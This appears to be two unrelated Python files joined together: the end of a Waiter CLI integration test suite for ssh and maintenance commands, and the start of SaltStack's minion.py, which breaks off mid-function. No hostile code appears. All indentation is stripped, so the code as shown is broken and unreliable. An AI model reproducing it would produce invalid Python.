self.assertIn(f'There are no relevant instances using service id {service_id}', stdout)
else:
self.assertEqual(0, cp.returncode, cp.stderr)
ssh_instance = util.get_ssh_instance_from_output(self.waiter_url, possible_instances, stdout,
container_name=container_name,
command_to_run=command_to_run)
self.assertIsNotNone(ssh_instance,
msg=f"None of the possible instances {possible_instances} were detected in ssh "
f"command output: \n{stdout}")
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_ssh_instance_id(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], test_instance=True)
def test_ssh_instance_id_failed_instance(self):
self.__test_ssh(lambda _, instances: instances['failed-instances'], is_failed_instance=True,
test_instance=True)
def test_ssh_instance_id_custom_cmd(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], test_instance=True,
command_to_run='ls -al')
def test_ssh_instance_id_custom_cmd_failed_instance(self):
self.__test_ssh(lambda _, instances: instances['failed-instances'], is_failed_instance=True,
test_instance=True, command_to_run='ls -al')
def test_ssh_instance_id_no_instance(self):
self.__test_ssh(lambda service_id, _: [{'id': service_id + '.nonexistent'}], test_instance=True,
expect_no_data=True)
def test_ssh_instance_id_no_service(self):
instance_id_no_service = "a.a"
cp = cli.ssh(self.waiter_url, instance_id_no_service, ssh_flags='-i')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
def test_ssh_service_id_single_instance(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], test_service=True)
def test_ssh_service_id_no_relevant_instances(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], test_service=True,
ssh_flags='--no-active', expect_no_instances=True)
def test_ssh_service_id_multiple_instances(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2,
stdin='1\n'.encode('utf8'), test_service=True)
def test_ssh_service_id_invalid_prompt_input(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2,
stdin='-123\n'.encode('utf8'), test_service=True, expect_out_of_range=True)
def test_ssh_service_id_non_existent_service(self):
service_id = "nonexistent"
cp = cli.ssh(self.waiter_url, service_id, ssh_flags='-s')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
def test_ssh_service_id_quick(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2, test_service=True,
quick=True)
def test_ssh_token_single_instance(self):
self.__test_ssh(lambda _, instances: instances['active-instances'])
def test_ssh_token_multiple_services_sorted(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], stdin='1\n'.encode('utf8'),
multiple_services=True)
def test_ssh_token_multiple_instances(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2,
stdin='1\n'.encode('utf8'))
def test_ssh_token_multiple_services_instances(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2, multiple_services=True,
stdin='1\n1\n'.encode('utf8'))
def test_ssh_token_multiple_services_instances_quick(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], min_instances=2, multiple_services=True,
quick=True)
def test_ssh_token_custom_container(self):
self.__test_ssh(lambda _, instances: instances['active-instances'], admin=True,
container_name='waiter-files')
def test_ssh_token_invalid_token(self):
token_name = "nonexistent"
cp = cli.ssh(self.waiter_url, token_name)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
def test_ssh_token_invalid_token_quick(self):
token_name = "nonexistent"
cp = cli.ssh(self.waiter_url, token_name, ssh_flags='-q')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('The token does not exist. You must create it first.', cli.stderr(cp))
def __test_ssh_token_no_services(self, ssh_flags=None):
token_name = self.token_name()
token_fields = util.minimal_service_description()
util.post_token(self.waiter_url, token_name, token_fields)
try:
cp = cli.ssh(self.waiter_url, token_name, ssh_flags=ssh_flags)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn(f'There are no services using token {token_name}', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name)
def test_ssh_token_no_services(self):
self.__test_ssh_token_no_services()
def test_ssh_token_no_services_quick(self):
self.__test_ssh_token_no_services(ssh_flags='-q')
def test_start_no_cluster(self):
self.__test_no_cluster(partial(cli.start))
def test_start_no_ping(self):
self.run_maintenance_stop_no_ping_test(cli.start)
def test_start_with_ping(self):
self.run_maintenance_stop_with_ping_test(cli.start)
def test_start_with_ping_no_wait(self):
self.run_maintenance_stop_with_ping_no_wait_test(cli.start)
def test_start_enforce_check_not_in_maintenance(self):
self.run_maintenance_stop_enforce_check_not_in_maintenance_test(cli.start)
def test_start_skip_check_not_in_maintenance(self):
self.run_maintenance_stop_skip_check_not_in_maintenance_test(cli.start)
def test_stop_no_cluster(self):
custom_maintenance_message = "custom maintenance message"
self.__test_no_cluster(partial(cli.stop, maintenance_flags=f'"{custom_maintenance_message}"'))
def test_stop_basic(self):
self.run_maintenance_start_test(cli.stop)
def test_stop_no_service_ask_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--ask-kill')
def test_stop_no_service_force_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--force-kill')
def test_stop_no_service_no_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--no-kill')
def test_stop_ping_service_ask_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--ask-kill', ping_token=True)
def test_stop_ping_service_force_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--force-kill', ping_token=True)
def test_stop_ping_service_no_kill(self):
self.run_maintenance_start_test(cli.stop, start_args='--no-kill', ping_token=True)
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import multiprocessing
from random import shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit
)
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
opts.get('master', 'Unknown'))
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in string_kwarg.iteritems():
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs:
raise SaltInvocationError(
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class SMinion(object):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
self.opts = opts
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if isinstance(self.opts['master'], list):
masters = self.opts['master']
if self.opts['random_master'] is True:
shuffle(masters)
for master in masters:
self.opts['master'] = master
self.opts.update(resolve_dns(opts))
try:
self.gen_modules()
break
except SaltClientError:
log.warning(('Attempted to authenticate with master '
'{0} and failed'.format(master)))
continue
else:
if self.opts['random_master'] is True:
log.warning('random_master is True but there is only one master specified. Ignoring.')
self.opts.update(resolve_dns(opts))
self.gen_modules(initial_load=True)
else:
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment']
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.returners = salt.loader.returners(self.opts, self.functions)
self.states = salt.loader.states(self.opts, self.functions)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
minion.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf)
return []
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts, self.functions)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_wait = self.opts['acceptance_wait_time_max']
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
self.io_loop.spawn_callback(self._connect_minion, s_opts)
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.io_loop = io_loop or zmq.eventloop.ioloop.ZMQIOLoop()
if not self.io_loop.initialized():
self.io_loop.install()
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module
self.opts['grains'] = salt.loader.grains(opts)
# TODO: remove?
def sync_connect_master(self):
'''
Block until we are connected to a master
'''
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(lambda f: self.io_loop.stop())
self.io_loop.start()
if self._connect_master_future.exception():
raise self._connect_master_future.exception()
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
self._post_master_init(master)
# TODO: better name...
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment']
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
})
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
})
self.grains_cache = self.opts['grains']
if 'proxy' in self.opts['pillar']:
log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
self.opts['pillar']['proxy']))
for p in self.opts['pillar']['proxy']:
log.debug('Starting {0} proxy.'.format(p))
pid = os.fork()
if pid > 0:
continue
else:
proxyminion = ProxyMinion(self.opts)
proxyminion.start(self.opts['pillar']['proxy'][p])
self.clean_die(signal.SIGTERM, None)
else:
log.debug('I am {0} and I am not supposed to start any proxies. '
'(Likely not a problem)'.format(self.opts['id']))
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts) # TODO: only run init once?? This will run once per attempt
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts,
timeout=timeout,
safe=safe,
io_loop=self.io_loop,
)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts,
timeout=timeout,
safe=safe,
io_loop=self.io_loop,
)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing errored: {0}. No beacons will be procssed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.handle_event(event)
self.epub_sock.send(event)
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target,
args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
else:
self.win_proc.append(process)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if opts.get('sudo_user', ''):
sudo_runas = opts.get('sudo_user')
if 'sudo.salt_call' in minion_instance.functions:
return_data = minion_instance.functions['sudo.salt_call'](
sudo_runas,
data['fun'],
*args,
**kwargs)
else:
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
